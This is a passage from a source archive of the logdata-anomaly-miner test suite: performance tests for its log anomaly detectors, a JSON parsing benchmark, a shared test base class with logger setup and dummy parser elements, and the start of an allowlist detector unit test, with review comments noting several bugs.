            target_path_list = None
            if number_of_paths is not None:
                target_path_list = ['d' + str(i) for i in range(number_of_paths)]
            efd = EventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], target_path_list=target_path_list)
            seconds = time.time()
            i = 0
            measured_time = 0
            while measured_time < self.waiting_time / 10:
                if number_of_paths is None:
                    path = 'd' + str(i)
                else:
                    path = 'd' + str(i % number_of_paths)
                decimal_integer_value_me = DecimalIntegerValueModelElement(
                    path, DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE)
                p = process_time()
                r = random.randint(1, 1000000)
                # Keep the cost of the random draw out of the synthetic clock.
                seconds = seconds + process_time() - p
                match_context = MatchContext(str(i).encode())
                match_element = decimal_integer_value_me.get_match_element('integer', match_context)
                # Timestamps jump backwards randomly; this is deliberate load-test input, not a realistic stream.
                log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), seconds - r, efd)
                measured_time += timeit.timeit(lambda: efd.receive_atom(log_atom), number=1)
                i = i + 1
            results[z] = i * 10
            z = z + 1
            avg = avg + i * 10
        avg = avg / self.iterations
        type(self).result = self.result + self.result_string % (
            efd.__class__.__name__, avg, results, 'a %s and %s different path(s).'
            % (new_match_path_detector.__class__.__name__, str(number_of_paths)))

    def run_event_sequence_detector(self, number_of_paths):
        """
        Run the performance tests for EventSequenceDetector.

        @param number_of_paths number of distinct parser paths to cycle through; None generates a new path for every atom
        and leaves the detector's id_path_list unset.
        """
        results = [None] * self.iterations
        avg = 0
        z = 0
        while z < self.iterations:
            # Used only for its class name in the report string.
            new_match_path_detector = NewMatchPathDetector(self.aminer_config, [
                self.stream_printer_event_handler], 'Default', True)
            id_path_list = None
            if number_of_paths is not None:
                id_path_list = ['d' + str(i) for i in range(number_of_paths)]
            esd = EventSequenceDetector(self.aminer_config, [self.stream_printer_event_handler], id_path_list=id_path_list)
            seconds = time.time()
            i = 0
            measured_time = 0
            while measured_time < self.waiting_time / 10:
                if number_of_paths is None:
                    path = 'd' + str(i)
                else:
                    path = 'd' + str(i % number_of_paths)
                decimal_integer_value_me = DecimalIntegerValueModelElement(
                    path, DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE)
                p = process_time()
                r = random.randint(1, 1000000)
                seconds = seconds + process_time() - p
                match_context = MatchContext(str(i).encode())
                match_element = decimal_integer_value_me.get_match_element('integer', match_context)
                log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), seconds - r, esd)
                measured_time += timeit.timeit(lambda: esd.receive_atom(log_atom), number=1)
                i = i + 1
            results[z] = i * 10
            z = z + 1
            avg = avg + i * 10
        avg = avg / self.iterations
        type(self).result = self.result + self.result_string % (
            esd.__class__.__name__, avg, results, 'a %s and %s different path(s).'
            % (new_match_path_detector.__class__.__name__, str(number_of_paths)))

    def test01atom_filters(self):
        """Start performance tests for AtomFilters."""
        self.run_atom_filters_match_path_filter(1)
        self.run_atom_filters_match_path_filter(30)
        self.run_atom_filters_match_path_filter(100)
        self.run_atom_filters_match_value_filter(1)
        self.run_atom_filters_match_value_filter(30)
        self.run_atom_filters_match_value_filter(100)

    def test02enhanced_new_match_path_value_combo_detector(self):
        """Start performance tests for EnhancedNewMatchPathValueComboDetector."""
        self.run_enhanced_new_match_path_value_combo_detector(1)
        self.run_enhanced_new_match_path_value_combo_detector(30)
        self.run_enhanced_new_match_path_value_combo_detector(100)

    def test03histogram_analysis(self):
        """Start performance tests for HistogramAnalysis (number of paths x number of bins)."""
        self.run_histogram_analysis(1, 100)
        self.run_histogram_analysis(30, 100)
        self.run_histogram_analysis(100, 100)
        self.run_histogram_analysis(10000, 100)
        self.run_histogram_analysis(1, 1000)
        self.run_histogram_analysis(30, 1000)
        self.run_histogram_analysis(100, 1000)
        self.run_histogram_analysis(10000, 1000)
        self.run_histogram_analysis(1, 10000)
        self.run_histogram_analysis(30, 10000)
        self.run_histogram_analysis(100, 10000)
        self.run_histogram_analysis(10000, 10000)

    def test04match_value_average_change_detector(self):
        """Start performance tests for MatchValueAverageChangeDetector."""
        self.run_match_value_average_change_detector(1)
        self.run_match_value_average_change_detector(30)
        self.run_match_value_average_change_detector(100)

    def test05match_value_stream_writer(self):
        """Start performance tests for MatchValueStreamWriter."""
        self.run_match_value_stream_writer(1)
        self.run_match_value_stream_writer(30)
        self.run_match_value_stream_writer(100)

    def test06missing_match_path_value_detector(self):
        """Start performance tests for MissingMatchPathValueDetector."""
        self.run_missing_match_path_value_detector(1)
        self.run_missing_match_path_value_detector(30)
        self.run_missing_match_path_value_detector(100)

    def test07new_match_path_detector(self):
        """Start performance tests for NewMatchPathDetector."""
        self.run_new_match_path_detector(1)
        self.run_new_match_path_detector(1000)
        self.run_new_match_path_detector(100000)

    def test08new_match_path_value_combo_detector(self):
        """Start performance tests for NewMatchPathValueComboDetector."""
        self.run_new_match_path_value_combo_detector(1)
        self.run_new_match_path_value_combo_detector(30)
        self.run_new_match_path_value_combo_detector(100)

    def test09new_match_path_value_detector(self):
        """Start performance tests for NewMatchPathValueDetector."""
        self.run_new_match_path_value_detector(1)
        self.run_new_match_path_value_detector(30)
        self.run_new_match_path_value_detector(100)

    def test10time_correlation_detector(self):
        """Start performance tests for TimeCorrelationDetector."""
        self.run_time_correlation_detector(10)
        self.run_time_correlation_detector(100)
        self.run_time_correlation_detector(1000)

    def test11time_correlation_violation_detector(self):
        """Start performance tests for TimeCorrelationViolationDetector."""
        self.run_time_correlation_violation_detector(0.99)
        self.run_time_correlation_violation_detector(0.95)
        self.run_time_correlation_violation_detector(0.50)
        self.run_time_correlation_violation_detector(0.01)

    def test12timestamp_correction_filters(self):
        """Start performance tests for TimestampCorrectionFilters."""
        self.run_timestamp_correction_filters(1)
        self.run_timestamp_correction_filters(1000)
        self.run_timestamp_correction_filters(100000)

    def test13timestamps_unsorted_detector(self):
        """Start performance tests for TimestampsUnsortedDetector."""
        self.run_timestamps_unsorted_detector(0.001)
        self.run_timestamps_unsorted_detector(0.1)
        self.run_timestamps_unsorted_detector(1)
        self.run_timestamps_unsorted_detector(100)

    def test14allowlist_violation_detector(self):
        """Start performance tests for AllowlistViolationDetector."""
        self.run_allowlist_violation_detector(1, 99)
        self.run_allowlist_violation_detector(1, 50)
        self.run_allowlist_violation_detector(1, 1)
        self.run_allowlist_violation_detector(1000, 99)
        self.run_allowlist_violation_detector(1000, 50)
        self.run_allowlist_violation_detector(1000, 1)
        self.run_allowlist_violation_detector(100000, 99)
        self.run_allowlist_violation_detector(100000, 50)
        self.run_allowlist_violation_detector(100000, 1)

    def test15new_match_id_value_combo_detector(self):
        """Start performance tests for NewMatchIdValueComboDetector."""
        self.run_new_match_id_value_combo_detector(0.1)
        self.run_new_match_id_value_combo_detector(5)
        self.run_new_match_id_value_combo_detector(20)
        self.run_new_match_id_value_combo_detector(100)

    def test16parser_count(self):
        """Start performance tests for ParserCount."""
        # use path
        self.run_parser_count(True, 60)
        self.run_parser_count(True, 1000)
        self.run_parser_count(True, 10000)
        self.run_parser_count(True, 100000)
        # use no path
        self.run_parser_count(False, 60)
        self.run_parser_count(False, 1000)
        self.run_parser_count(False, 10000)
        self.run_parser_count(False, 100000)

    def test17event_correlation_detector(self):
        """Start performance tests for EventCorrelationDetector, varying one parameter at a time around a baseline run."""
        self.run_event_correlation_detector(1.0, 5, 0.9, 0.05, 1000, 500, 5, 120, 180)
        self.run_event_correlation_detector(0.5, 5, 0.9, 0.05, 1000, 500, 5, 120, 180)
        self.run_event_correlation_detector(0.1, 5, 0.9, 0.05, 1000, 500, 5, 120, 180)
        self.run_event_correlation_detector(1.0, 10, 0.9, 0.05, 1000, 500, 5, 120, 180)
        self.run_event_correlation_detector(1.0, 5, 0.9, 0.05, 1000, 500, 5, 120, 180)
        self.run_event_correlation_detector(1.0, 1, 0.9, 0.05, 1000, 500, 5, 120, 180)
        self.run_event_correlation_detector(1.0, 0.1, 0.9, 0.05, 1000, 500, 5, 120, 180)
        self.run_event_correlation_detector(1.0, 5, 1.0, 0.01, 1000, 500, 5, 120, 180)
        self.run_event_correlation_detector(1.0, 5, 0.9, 0.05, 1000, 500, 5, 120, 180)
        self.run_event_correlation_detector(1.0, 5, 0.7, 0.1, 1000, 500, 5, 120, 180)
        self.run_event_correlation_detector(1.0, 5, 0.9, 0.05, 1000, 500, 5, 120, 180)
        self.run_event_correlation_detector(1.0, 5, 0.9, 0.05, 2000, 500, 5, 120, 180)
        self.run_event_correlation_detector(1.0, 5, 0.9, 0.05, 10000, 500, 5, 120, 180)
        self.run_event_correlation_detector(1.0, 5, 0.9, 0.05, 1000, 500, 5, 120, 180)
        self.run_event_correlation_detector(1.0, 5, 0.9, 0.05, 1000, 1000, 5, 120, 180)
        self.run_event_correlation_detector(1.0, 5, 0.9, 0.05, 1000, 2000, 5, 120, 180)
        self.run_event_correlation_detector(1.0, 5, 0.9, 0.05, 1000, 500, 5, 120, 180)
        self.run_event_correlation_detector(1.0, 5, 0.9, 0.05, 1000, 500, 10, 120, 180)
        self.run_event_correlation_detector(1.0, 5, 0.9, 0.05, 1000, 500, 100, 120, 180)
        self.run_event_correlation_detector(1.0, 5, 0.9, 0.05, 1000, 500, 5, 120, 180)
        self.run_event_correlation_detector(1.0, 5, 0.9, 0.05, 1000, 500, 5, 60, 90)
        self.run_event_correlation_detector(1.0, 5, 0.9, 0.05, 1000, 500, 5, 30, 45)

    def test18match_filter(self):
        """Start performance tests for MatchFilter."""
        self.run_match_filter(1)
        self.run_match_filter(1000)
        self.run_match_filter(100000)

    def test19event_type_detector(self):
        """Start performance tests for EventTypeDetector."""
        self.run_event_type_detector(None)
        self.run_event_type_detector(1)
        self.run_event_type_detector(10)
        self.run_event_type_detector(100)

    def test20variable_type_detector(self):
        """Start performance tests for VariableTypeDetector."""
        self.run_variable_type_detector(None)
        self.run_variable_type_detector(1)
        self.run_variable_type_detector(10)
        self.run_variable_type_detector(100)

    def test21variable_correlation_detector(self):
        """Start performance tests for VariableCorrelationDetector."""
        # The VCD should never be run without restricting the paths (in the ETD or via ignore_list / constraint_list), as the
        # performance is terrible; the unrestricted case is therefore left disabled.
        # self.run_variable_correlation_detector(None)
        self.run_variable_correlation_detector(1)
        self.run_variable_correlation_detector(10)
        self.run_variable_correlation_detector(100)

    def test22event_frequency_detector(self):
        """Start performance tests for EventFrequencyDetector."""
        self.run_event_frequency_detector(None)
        self.run_event_frequency_detector(1)
        self.run_event_frequency_detector(10)
        self.run_event_frequency_detector(100)

    # NOTE(review): method name says "frequency" but this exercises the EventSequenceDetector; renaming to
    # test23event_sequence_detector would make test output easier to read (name kept here to avoid changing test IDs).
    def test23event_frequency_detector(self):
        """Start performance tests for EventSequenceDetector."""
        self.run_event_sequence_detector(1)
        self.run_event_sequence_detector(10)
        self.run_event_sequence_detector(100)


if __name__ == '__main__':
    unittest.main()
logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/JsonModelElementPerformanceTest.py000066400000000000000000000070431500476301700305640ustar00rootroot00000000000000import unittest
from aminer.input.JsonStateMachine import json_machine
from unit.TestBase import TestBase
from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler
from aminer.input.LogAtom import LogAtom
from aminer.AnalysisChild import AnalysisContext
from aminer.parsing.MatchContext import MatchContext
import time
import random
from time import process_time
from _io import StringIO
import timeit
# NOTE(review): the test below uses importlib.util.*, but only `import importlib` is executed here. importlib.util is a
# submodule and is only available as an attribute if something else already imported it; `import importlib.util` would be the
# robust form.
import importlib

# Module-level state shared with the json_machine callback; reset in setUp and after every parsed document.
breakout = False
data = None


def found_json(_data):
    """Set the breakout variable if the JsonStateMachine finished and keep the parsed document in the module-level `data`."""
    global breakout
    breakout = True
    global data
    data = _data


class JsonModelElementPerformanceTest(TestBase):
    """These unittests test the performance of the JsonModelElement."""

    result_string = "The JsonModelElement could in average handle %d LogAtoms %s\n"
    result = ""
    iterations = 10
    waiting_time = 1
    state = json_machine(found_json)
    # Mutable class attribute; not used by the test in this file.
    log_atoms = []

    @classmethod
    def tearDownClass(cls):
        """Run the TestBase tearDownClass method and print the results."""
        super(JsonModelElementPerformanceTest, cls).tearDownClass()
        print("\nwaiting time: %d seconds" % cls.waiting_time)
        print(cls.result)

    def setUp(self):
        """Set up needed variables and reset the shared JSON state machine."""
        TestBase.setUp(self)
        self.output_stream = StringIO()
        self.stream_printer_event_handler = StreamPrinterEventHandler(self.analysis_context, self.output_stream)
        global breakout
        breakout = False
        global data
        data = None
        self.state = json_machine(found_json)

    @staticmethod
    def run_test(json_me, json_data):
        """Parse every pre-split JSON document once; the return values are discarded, only the runtime is of interest."""
        for d in json_data:
            json_me.get_match_element("path", MatchContext(d))

    def test1_aminer_demo_data(self):
        """
        Run the performance tests with the output of the aminer demo.

        Loads the JSON demo log, splits it into individual documents with the JsonStateMachine, builds the parsing model from
        the demo YAML configuration and measures how many documents per waiting_time the JsonModelElement parses.
        """
        with open("demo/aminerJsonInputDemo/json_logs/aminer.log", "rb") as f:
            stream_data = f.read()
        # NOTE(review): this executes whatever Python file is installed at the hard-coded absolute path, so the test
        # depends on (and trusts) the system-wide aminer installation rather than the checked-out source tree.
        spec = importlib.util.spec_from_file_location("aminer_config", "/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py")
        aminer_config = importlib.util.module_from_spec(spec)
        spec.loader.exec_module(aminer_config)
        aminer_config.load_yaml("demo/aminerJsonInputDemo/json-aminer-demo.yml")
        yml_context = AnalysisContext(aminer_config)
        yml_context.build_analysis_pipeline()
        json_me = yml_context.atomizer_factory.parsing_model
        json_data = []
        global breakout
        global data
        # Split the byte stream into one entry per complete JSON document. The state machine signals completion through the
        # found_json callback (breakout) or by returning None.
        while len(stream_data) > 0:
            i = 0
            for i, char in enumerate(stream_data):
                self.state = self.state(char)
                if breakout or self.state is None:
                    json_data.append(stream_data[:i+1])
                    breakout = False
                    data = None
                    self.state = json_machine(found_json)
                    break
            # If the for loop ran to the end without a break, i is the last index and this empties stream_data, so the
            # outer loop always terminates. Re-slicing the remainder each round is quadratic in the file size.
            stream_data = stream_data[i+1:]
        results = [None] * self.iterations
        avg = 0
        z = 0
        while z < self.iterations:
            #result = self.waiting_time / (timeit.timeit(lambda: self.run_test(json_me, json_data), number=1) / 1)
            # documents per waiting_time = waiting_time / (seconds per full pass) * documents per pass
            result = self.waiting_time / (timeit.timeit(lambda: self.run_test(json_me, json_data), number=10) / 10)
            results[z] = int(result * len(json_data))
            z = z + 1
            avg = avg + result * len(json_data)
        avg = int(avg / self.iterations)
        type(self).result = self.result + self.result_string % (avg, results)


if __name__ == "__main__":
    unittest.main()
logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/TestBase.py000066400000000000000000000324371500476301700240550ustar00rootroot00000000000000import unittest
import os
import shutil
import logging
import sys
import errno
import inspect
from aminer.AminerConfig import KEY_LOG_DIR, DEFAULT_LOG_DIR, KEY_PERSISTENCE_DIR, DEFAULT_PERSISTENCE_DIR, DEBUG_LOG_NAME,\
    KEY_REMOTE_CONTROL_LOG_FILE, KEY_STAT_LOG_FILE, KEY_DEBUG_LOG_FILE, REMOTE_CONTROL_LOG_NAME, DEFAULT_REMOTE_CONTROL_LOG_FILE,\
    STAT_LOG_NAME, DEFAULT_STAT_LOG_FILE, DEBUG_LEVEL, load_config, build_persistence_file_name, DEFAULT_DEBUG_LOG_FILE
from aminer.AnalysisChild import AnalysisContext
from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler
from aminer.parsing.ModelElementInterface import ModelElementInterface
from aminer.parsing.MatchElement import MatchElement
from aminer.util import PersistenceUtil
from aminer.util import SecureOSFunctions
from _io import StringIO


def initialize_loggers(aminer_config, aminer_user_id, aminer_grp_id):
    """
    Initialize all loggers (remote control, statistics, debug) for the test run.

    Creates the default log directory below the persistence directory if needed, validates that the configured log file
    names do not carry directory components, opens the log directory through SecureOSFunctions and attaches one FileHandler
    per logger, chown'ing each file to the given ids.

    @param aminer_config configuration object; only config_properties is read.
    @param aminer_user_id uid passed to os.chown for the created log files / directory.
    @param aminer_grp_id gid passed to os.chown for the created log files / directory.
    Exits the process (sys.exit(1)) on invalid log file settings or when a log file cannot be created.
    """
    datefmt = '%d/%b/%Y:%H:%M:%S %z'
    log_dir = aminer_config.config_properties.get(KEY_LOG_DIR, DEFAULT_LOG_DIR)
    if log_dir == DEFAULT_LOG_DIR:
        try:
            if not os.path.isdir(log_dir):
                persistence_dir_path = aminer_config.config_properties.get(KEY_PERSISTENCE_DIR, DEFAULT_PERSISTENCE_DIR)
                persistence_dir_fd = SecureOSFunctions.secure_open_base_directory(persistence_dir_path)
                # The default log dir is only created relative to the (securely opened) default persistence dir fd.
                if SecureOSFunctions.base_dir_path == DEFAULT_PERSISTENCE_DIR:
                    relative_path_log_dir = os.path.split(DEFAULT_LOG_DIR)[1]
                    os.mkdir(relative_path_log_dir, dir_fd=persistence_dir_fd)
                    os.chown(relative_path_log_dir, aminer_user_id, aminer_grp_id, dir_fd=persistence_dir_fd, follow_symlinks=False)
        except OSError as e:
            if e.errno != errno.EEXIST:
                msg = 'Unable to create log-directory: %s' % log_dir
            else:
                # BUG(review): msg becomes the OSError instance here, so msg.strip('\n') below raises AttributeError on
                # EEXIST instead of logging the error; should be str(e).
                msg = e
            logging.getLogger(DEBUG_LOG_NAME).error(msg.strip('\n'))
            print(msg, file=sys.stderr)
    # Path-traversal guard: log file settings must be bare file names so they cannot point outside log_dir.
    # NOTE(review): `b'/' in tmp_value` raises TypeError when tmp_value is a str (the .startswith()/os.path.join calls further
    # down treat these values as str). Confirm the value type delivered by config_properties; if it is str, a configured
    # value makes this guard crash rather than reject.
    tmp_value = aminer_config.config_properties.get(KEY_REMOTE_CONTROL_LOG_FILE)
    if tmp_value is not None and b'/' in tmp_value:
        print('%s attribute must not contain a full directory path, but only the filename.' % KEY_REMOTE_CONTROL_LOG_FILE, file=sys.stderr)
        sys.exit(1)
    tmp_value = aminer_config.config_properties.get(KEY_STAT_LOG_FILE)
    if tmp_value is not None and b'/' in tmp_value:
        print('%s attribute must not contain a full directory path, but only the filename.' % KEY_STAT_LOG_FILE, file=sys.stderr)
        sys.exit(1)
    tmp_value = aminer_config.config_properties.get(KEY_DEBUG_LOG_FILE)
    if tmp_value is not None and b'/' in tmp_value:
        print('%s attribute must not contain a full directory path, but only the filename.' % KEY_DEBUG_LOG_FILE, file=sys.stderr)
        sys.exit(1)
    log_dir_fd = SecureOSFunctions.secure_open_log_directory(log_dir, os.O_RDONLY | os.O_DIRECTORY | os.O_PATH)
    rc_logger = logging.getLogger(REMOTE_CONTROL_LOG_NAME)
    rc_logger.setLevel(logging.DEBUG)
    remote_control_log_file = aminer_config.config_properties.get(
        KEY_REMOTE_CONTROL_LOG_FILE, os.path.join(log_dir, DEFAULT_REMOTE_CONTROL_LOG_FILE))
    # startswith() is a plain string-prefix test, not a path-containment check; it is only safe because the guard above is
    # meant to reject any value containing a directory separator.
    if not remote_control_log_file.startswith(log_dir):
        remote_control_log_file = os.path.join(log_dir, remote_control_log_file)
    try:
        # NOTE(review): FileHandler opens the path directly (following symlinks), while the chown is symlink-safe and,
        # with an absolute path, dir_fd has no effect. The two calls are not atomic with respect to each other.
        rc_file_handler = logging.FileHandler(remote_control_log_file)
        os.chown(remote_control_log_file, aminer_user_id, aminer_grp_id, dir_fd=log_dir_fd, follow_symlinks=False)
    except OSError as e:
        print('Could not create or open %s: %s. Stopping..' % (remote_control_log_file, e), file=sys.stderr)
        sys.exit(1)
    rc_file_handler.setFormatter(logging.Formatter(fmt='%(asctime)s %(levelname)s %(message)s', datefmt=datefmt))
    rc_logger.addHandler(rc_file_handler)
    logging.addLevelName(15, "REMOTECONTROL")
    stat_logger = logging.getLogger(STAT_LOG_NAME)
    stat_logger.setLevel(logging.INFO)
    stat_log_file = aminer_config.config_properties.get(KEY_STAT_LOG_FILE, os.path.join(log_dir, DEFAULT_STAT_LOG_FILE))
    if not stat_log_file.startswith(log_dir):
        stat_log_file = os.path.join(log_dir, stat_log_file)
    try:
        stat_file_handler = logging.FileHandler(stat_log_file)
        os.chown(stat_log_file, aminer_user_id, aminer_grp_id, dir_fd=log_dir_fd, follow_symlinks=False)
    except OSError as e:
        print('Could not create or open %s: %s. Stopping..' % (stat_log_file, e), file=sys.stderr)
        sys.exit(1)
    stat_file_handler.setFormatter(logging.Formatter(fmt='%(asctime)s %(message)s', datefmt=datefmt))
    stat_logger.addHandler(stat_file_handler)
    debug_logger = logging.getLogger(DEBUG_LOG_NAME)
    # DEBUG_LEVEL is a module constant from AminerConfig: 0 -> errors only, 1 -> info, anything else -> full debug.
    if DEBUG_LEVEL == 0:
        debug_logger.setLevel(logging.ERROR)
    elif DEBUG_LEVEL == 1:
        debug_logger.setLevel(logging.INFO)
    else:
        debug_logger.setLevel(logging.DEBUG)
    debug_log_file = aminer_config.config_properties.get(
        KEY_DEBUG_LOG_FILE, os.path.join(log_dir, DEFAULT_DEBUG_LOG_FILE))
    if not debug_log_file.startswith(log_dir):
        debug_log_file = os.path.join(log_dir, debug_log_file)
    try:
        debug_file_handler = logging.FileHandler(debug_log_file)
        os.chown(debug_log_file, aminer_user_id, aminer_grp_id, dir_fd=log_dir_fd, follow_symlinks=False)
    except OSError as e:
        print('Could not create or open %s: %s. Stopping..' % (debug_log_file, e), file=sys.stderr)
        sys.exit(1)
    debug_file_handler.setFormatter(logging.Formatter(fmt='%(asctime)s %(levelname)s %(message)s', datefmt=datefmt))
    debug_logger.addHandler(debug_file_handler)


class TestBase(unittest.TestCase):
    """This is the base class for all unittests: per-test config loading, a clean persistence directory and logger setup."""

    def get_config_file_path(self):
        """
        Get the module name to choose the right config file for parallel execution.
        Example: logdata-anomaly-miner/aecid-testsuite/unit/analysis/AtomFiltersTest.py - we want to know the directory analysis.

        NOTE(review): split("unit/")[1] takes the text after the *first* occurrence of "unit/" in the module's absolute path,
        so a checkout whose parent directories contain "unit/" (e.g. /home/unit/...) selects the wrong config.
        """
        return os.getcwd()+'/unit/data/parallel_configs/%s_config.py' % inspect.getmodule(self).__file__.split("unit/")[1].split("/")[0]

    def setUp(self):
        """
        Set up all needed variables and remove persisted data.

        Deletes and recreates the persistence directory named in the per-module test config, so that config must never
        point at a real aminer persistence directory: shutil.rmtree() removes it unconditionally.
        """
        PersistenceUtil.persistable_components = []
        self.aminer_config = load_config(self.get_config_file_path())
        self.analysis_context = AnalysisContext(self.aminer_config)
        self.output_stream = StringIO()
        self.stream_printer_event_handler = StreamPrinterEventHandler(self.analysis_context, self.output_stream)
        persistence_dir_name = build_persistence_file_name(self.aminer_config)
        if os.path.exists(persistence_dir_name):
            shutil.rmtree(persistence_dir_name)
        if not os.path.exists(persistence_dir_name):
            # initialize_loggers expects the "log" subdirectory to exist already.
            os.makedirs(os.path.join(persistence_dir_name, "log"))
        initialize_loggers(self.aminer_config, os.getuid(), os.getgid())
        # SecureOSFunctions works on bytes paths; build_persistence_file_name may apparently return either type.
        if isinstance(persistence_dir_name, str):
            persistence_dir_name = persistence_dir_name.encode()
        SecureOSFunctions.secure_open_base_directory(persistence_dir_name, os.O_RDONLY | os.O_DIRECTORY | os.O_PATH)
        PersistenceUtil.SKIP_PERSISTENCE_ID_WARNING = True

    def tearDown(self):
        """Delete all persisted data after the tests, leave an empty persistence directory and close the base directory fd."""
        self.aminer_config = load_config(self.get_config_file_path())
        persistence_file_name = build_persistence_file_name(self.aminer_config)
        if os.path.exists(persistence_file_name):
            shutil.rmtree(persistence_file_name)
        if not os.path.exists(persistence_file_name):
            os.makedirs(persistence_file_name)
        SecureOSFunctions.close_base_directory()

    def reset_output_stream(self):
        """Reset the output stream so the next assertion sees only new event handler output."""
        self.output_stream.seek(0)
        self.output_stream.truncate(0)

    def compare_match_results(self, data, match_element, match_context, id_, path, match_string, match_object, children):
        """
        Compare the results of get_match_element() if match_element is not None.

        Checks path, match_string and match_object of the element, the (one level deep) children, and that match_context
        consumed exactly match_string from data.
        """
        self.assertEqual(match_element.path, "%s/%s" % (path, id_))
        self.assertEqual(match_element.match_string, match_string)
        self.assertEqual(match_element.match_object, match_object)
        if children is None:
            # second argument is only the failure message
            self.assertIsNone(match_element.children, children)
        else:
            self.assertEqual(len(children), len(match_element.children))
            for i, child in enumerate(children):
                self.assertEqual(match_element.children[i].path, child.path)
                self.assertEqual(match_element.children[i].match_string, child.match_string)
                self.assertEqual(match_element.children[i].match_object, child.match_object)
                self.assertIsNone(match_element.children[i].children, children)
        self.assertEqual(match_context.match_string, match_string)
        self.assertEqual(match_context.match_data, data[len(match_string):])

    def compare_no_match_results(self, data, match_element, match_context):
        """Compare the results of get_match_element() when no match is expected: element is None and no data was consumed."""
        self.assertIsNone(match_element, None)
        self.assertEqual(match_context.match_data, data)


class DummyMatchContext:
    """Dummy class for MatchContext: holds the remaining data and the bytes consumed so far."""

    def __init__(self, match_data: bytes):
        """Initiate the Dummy class."""
        self.match_data = match_data
        self.match_string = b''

    def update(self, match_string: bytes):
        """Consume len(match_string) bytes from match_data and append them to match_string."""
        self.match_data = self.match_data[len(match_string):]
        self.match_string += match_string


class DummyFixedDataModelElement(ModelElementInterface):
    """Dummy class for fixed string ModelElements."""

    def __init__(self, element_id: str, data: bytes):
        self.element_id = element_id
        self.data = data

    def get_match_element(self, path: str, match_context):
        """@return None when there is no match, MatchElement otherwise."""
        if not match_context.match_data.startswith(self.data):
            return None
        match_context.update(self.data)
        return MatchElement("%s/%s" % (path, self.element_id), self.data, self.data, None)


class DummyNumberModelElement(ModelElementInterface):
    """Dummy class for a run of decimal digits; element_id is presumably set by the ModelElementInterface constructor."""

    def get_match_element(self, path: str, match_context):
        """
        @return None when the data does not start with a digit, otherwise a MatchElement whose match_object is the int value.

        NOTE(review): when the whole remaining data is digits, the final return does not call match_context.update(), unlike
        the early-return branch, so the context is left unconsumed in that case; and empty match_data reaches int(b"") and
        raises ValueError.
        """
        for i in range(len(match_context.match_data)):
            if match_context.match_data[i:i+1] not in b"0123456789":
                if i == 0:
                    return None
                match_data = match_context.match_data[:i]
                match_context.update(match_data)
                return MatchElement(f"{path}/{self.element_id}", match_data, int(match_data), None)
        return MatchElement(f"{path}/{self.element_id}", match_context.match_data, int(match_context.match_data), None)


class DummyFirstMatchModelElement(ModelElementInterface):
    """This class defines a model element to return the match from the first matching child model within a given list."""

    def __init__(self, element_id, children):
        self.element_id = element_id
        self.children = children
        if (children is None) or (None in children):
            msg = 'Invalid children list'
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)

    def get_match_element(self, path, match_context):
        """@return None when there is no match, MatchElement otherwise."""
        current_path = "%s/%s" % (path, self.element_id)
        match_data = match_context.match_data
        for child_element in self.children:
            child_match = child_element.get_match_element(current_path, match_context)
            if child_match is not None:
                return child_match
        # Restore the data so a failed attempt leaves the context untouched.
        match_context.match_data = match_data
        return None


class DummySequenceModelElement(ModelElementInterface):
    """This class defines an element to find matches that comprise matches of all given child model elements."""

    def __init__(self, element_id, children):
        self.element_id = element_id
        self.children = children
        if (children is None) or (None in children):
            msg = 'Invalid children list'
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)

    def get_match_element(self, path, match_context):
        """
        Try to find a match on given data for this model element and all its children.
        When a match is found, the matchContext is updated accordingly.
        @param path the model path to the parent model element invoking this method.
        @param match_context an instance of MatchContext class holding the data context to match against.
        @return the matchElement or None if model did not match.
        """
        current_path = f"{path}/{self.element_id}"
        start_data = match_context.match_data
        matches = []
        for child_element in self.children:
            child_match = child_element.get_match_element(current_path, match_context)
            if child_match is None:
                # Roll back whatever earlier children consumed.
                match_context.match_data = start_data
                return None
            matches += [child_match]
        # match_string and match_object are both the bytes consumed by all children together.
        return MatchElement(current_path, start_data[:len(start_data) - len(match_context.match_data)],
                            start_data[:len(start_data) - len(match_context.match_data)], matches)


if __name__ == "__main__":
    unittest.main()
logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/__init__.py000066400000000000000000000000001500476301700240570ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysis/000077500000000000000000000000001500476301700236035ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysis/AllowlistViolationDetectorTest.py000066400000000000000000000216051500476301700323520ustar00rootroot00000000000000import unittest
from aminer.analysis.Rules import PathExistsMatchRule
from aminer.parsing.FixedDataModelElement import FixedDataModelElement
from aminer.parsing.MatchContext import MatchContext
from aminer.input.LogAtom import LogAtom
from aminer.parsing.ParserMatch import ParserMatch
from aminer.analysis.AllowlistViolationDetector import AllowlistViolationDetector
from unit.TestBase import TestBase
from datetime import datetime
import time


class AllowlistViolationDetectorTest(TestBase):
    """Unittests for the AllowlistViolationDetector."""

    def test1receive_atom(self):
        """This test case checks if valid
inputs are recognized.

        Atoms whose match path is covered by one of the allowlist rules (match/s1, match/s2) are accepted silently; an atom
        with an uncovered path (match/s3) is rejected and a "No allowlisting for current atom" event is emitted.
        """
        fixed_string = b"fixed String"
        path_exists_match_rule = PathExistsMatchRule("match/s1", None)
        path_exists_match_rule2 = PathExistsMatchRule("match/s2", None)
        t = time.time()
        allowlist_violation_detector = AllowlistViolationDetector(self.aminer_config, [path_exists_match_rule, path_exists_match_rule2], [
            self.stream_printer_event_handler], output_logline=False)

        # path match/s1 is allowlisted by the first rule: accepted, no output
        fixed_dme = FixedDataModelElement("s1", fixed_string)
        match_context = MatchContext(fixed_string)
        match_element = fixed_dme.get_match_element("match", match_context)
        log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, allowlist_violation_detector)
        self.assertTrue(allowlist_violation_detector.receive_atom(log_atom))
        self.assertEqual(self.output_stream.getvalue(), "")

